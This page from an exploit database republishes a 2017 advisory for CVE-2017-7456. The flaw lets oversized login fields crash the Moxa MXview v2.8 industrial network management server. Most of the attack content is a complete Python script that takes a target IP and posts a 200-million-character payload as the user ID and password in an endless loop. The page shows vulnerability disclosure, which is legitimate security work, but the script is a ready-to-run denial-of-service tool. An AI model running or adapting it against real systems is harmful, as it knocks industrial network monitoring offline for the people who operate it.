[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Moxa MXview v2.8 Denial Of Service Exploit

Author
hyp3rlinx
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-27549
Category
dos / poc
Date add
10-04-2017
CVE
CVE-2017-7456
Platform
windows
[+] Credits: John Page AKA hyp3rlinx

Vendor:
============
www.moxa.com


Product:
===========
MXView v2.8

Download:
http://www.moxa.com/product/MXstudio.htm

MXview Industrial Network Management Software.

Auto discovery of network devices and physical connections
Event playback for quick troubleshooting
Color-coded VLAN/IGMP groups and other visualized network data
Supports MXview ToGo mobile app for remote monitoring and notification—anytime, anywhere.



Vulnerability Type:
===================
Denial Of Service



CVE Reference:
==============
CVE-2017-7456



Security Issue:
================
Remote attackers can DOS MXView server by sending large string of junk characters for the user ID and password field login credentials.



Exploit/POC:
=============
import urllib,urllib2

print 'Moxa MXview v2.8 web interface DOS'
print 'hyp3rlinx'

IP=raw_input("[Moxa MXView IP]>")

PAYLOAD="A"*200000000

url = 'http://'+IP+'/goform/account'
data = urllib.urlencode({'uid' : PAYLOAD, 'pwd' : PAYLOAD, 'action' : 'login'})

while 1:
req = urllib2.Request(url, data)
res = urllib2.urlopen(req)
print res

#  0day.today [2024-11-15]  #